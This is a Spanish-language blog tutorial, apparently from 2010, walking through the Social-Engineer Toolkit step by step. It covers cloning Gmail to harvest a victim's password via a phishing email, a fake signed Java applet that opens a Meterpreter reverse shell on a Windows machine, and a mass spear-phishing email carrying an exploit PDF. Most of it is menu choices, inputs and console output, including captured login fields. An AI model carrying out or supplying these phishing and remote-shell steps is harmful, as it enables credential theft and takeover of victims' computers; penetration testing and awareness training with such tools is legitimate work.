SET , es un conjunto de herramientas diseñadas para hacer ataques de ingenieria social , esta programado en python por David Kennedy , es capas de realizar envios de correo electronico individulaes o masivos , para realizar capturas de contraseñas mediante falsificacion de paginas web (ejem gmail) , obtencion de shell remotas en windows mediante java appelts , esto lo hace apoyándose en Metasploit, asi como phishing enviando un pdf para obtener shell remota. A continuacion vamos a explorar cada una de sus posibilidades :
0 .- INSTALACION DE SET
# svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
Configuracion
vi SET/config/set_config
METASPLOIT_PATH=/opt/metasploit3/msf3
ETTERCAP=ON
ETTERCAP_INTERFACE=eth0
ETTERCAP_PATH=/usr/share/ettercap
WEBATTACK_EMAIL=ON
AUTO_DETECT=ON
SELF_SIGNED_APPLET=ON
Iniciar set
#./set
A.- ROBO DE CONTRASEÑAS
./set
2. Website Attack Vectors
3. Credential Harvester Attack Method
2. Site Cloner
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
Enter the site to redirect to attack machine (enter for default): http://www.google.com.pe
Do you want to use bridged mode yes or no: yes
Enter your network interface for the bridge: 192.168.10.160
1. E-Mail Attack Single Email Address
Enter who you want to send email to: correoatacado@dominio.com
1. Use a GMAIL Account for your email attack.
Enter your GMAIL email address: jroliva@gmail.com
Enter your password for gmail (it will not be displayed back to you):
Enter the subject of the email: Hola reviza por favor esto
Type your body and enter control+c when you are finished: Hola pls revisa esta web que es interesante http://192.168.1.160
[*] SET has finished sending the emails.
Press <enter> when your all done…
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
a) La victima ingresa a su correo e ingresa a la dirección
b) hace click en el link y lo redirecciona a una pagina falsa de gmail
c) la victima ingresa su datos
En la consola de SET se muestra esto :
192.168.10.160 – – [20/Nov/2010 23:30:41] «GET / HTTP/1.1» 200 –
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=2693685243265863305
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=NHUd9ONphyY
POSSIBLE USERNAME FIELD FOUND: Email=usuarioatacado
POSSIBLE PASSWORD FIELD FOUND: Passwd=XXXXXXXXXX
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
192.168.10.160 – – [20/Nov/2010 23:32:11] code 404, message File not found
192.168.10.160 – – [20/Nov/2010 23:32:11] «GET /favicon.ico HTTP/1.1» 404 –
192.168.10.160 – – [20/Nov/2010 23:32:15] code 404, message File not found
192.168.10.160 – – [20/Nov/2010 23:32:15] «GET /favicon.ico HTTP/1.1» 404 –
CRTL+C
8. Return to the previous menu
11. Exit the Social-Engineer Toolkit
Ver el reporte
vi reports/2010-11-20\ 23\:37\:08.985597.xml
B.- ATAQUE JAVA APPLET
./set
2. Website Attack Vectors
1. The Java Applet Attack Method
2. Site Cloner
Cuáles son su nombre y su apellido?
[Unknown]: Google
¿Cuál es el nombre de su unidad de organización?
[Unknown]: Google
¿Cuál es el nombre de su organización?
[Unknown]: Google
¿Cuál es el nombre de su ciudad o localidad?
[Unknown]: Lima
¿Cuál es el nombre de su estado o provincia?
[Unknown]: Lima
¿Cuál es el código de país de dos letras de la unidad?
[Unknown]: PE
¿Es correcto CN=Google, OU=Google, O=Google, L=Lima, ST=Lima, C=PE?
[no]: si
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://www.google.com
What payload do you want to generate:
Enter choice (hit enter for default): presionar enter
Select one of the below, ‘backdoored executable’ is typically the best.
Enter your choice (enter for default): presionar enter
[-] Enter the PORT of the listener (enter for default): presionar enter
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
Enter choice yes or no: no
Enter the site to redirect to attack machine (enter for default): http://www.google.com
Do you want to use bridged mode yes or no: yes
Enter your network interface for the bridge: wlan0
1. E-Mail Attack Single Email Address :
Enter who you want to send email to: emailatacado@gmail.com
1. Use a GMAIL Account for your email attack.
Enter your GMAIL email address: tucuenta@gmail.com
Enter your password for gmail (it will not be displayed back to you): tupass
Enter the subject of the email: hola visita esta pagina es interesante
Do you want to send the message as html or plain? 2
Type your body and enter control+c when you are finished: hola amigo visita esta pagina esta muy buena http://192.168.1.160
Next line of the body: presionar control+c + enter
La victima recibe el correo
ingresa a la pagina
La pagina pide descargar un applet de «Microsoft»
Luego es redireccionado a google
Mientras en el shell ya se creo un session de metarpeter
msf exploit(handler) > sessions -i 1
meterpreter > shell
Process 3284 created.
Channel 1 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Escritorio>
Ya estamos dentro del equipo !!!!!
C.- PHISHING
./set
1. Spear-Phishing Attack Vectors
3. Create a Social-Engineering Template
Enter the name of the author: Juan
Enter the subject of the email: Hola mira esto
Type your body and enter control+c when you are finished: Mira esta pagina es realmente interesante http://www.theline.com
1. Perform a Mass Email Attack
7. Adobe JBIG2Decode Memory Corruption Exploit
2. Windows Meterpreter Reverse_TCP
Enter the port to connect back on (press enter for default): 443
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don’t care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default):2
Enter the new filename: informe1012.pdf
1. E-Mail Attack Single Email Address
1. Pre-Defined Template
6: Status Report
Enter who you want to send email to: emailvictima@dominio.com
1. Use a GMAIL Account for your email attack.
Enter your GMAIL email address: tucorreo@gmail.com
Do you want to setup a listener yes or no: yes
Mas informacion : http://www.dragonjar.org/video-tutorial-set-social-engineering-toolkit.xhtml
Juan Oliva 
Deja un comentario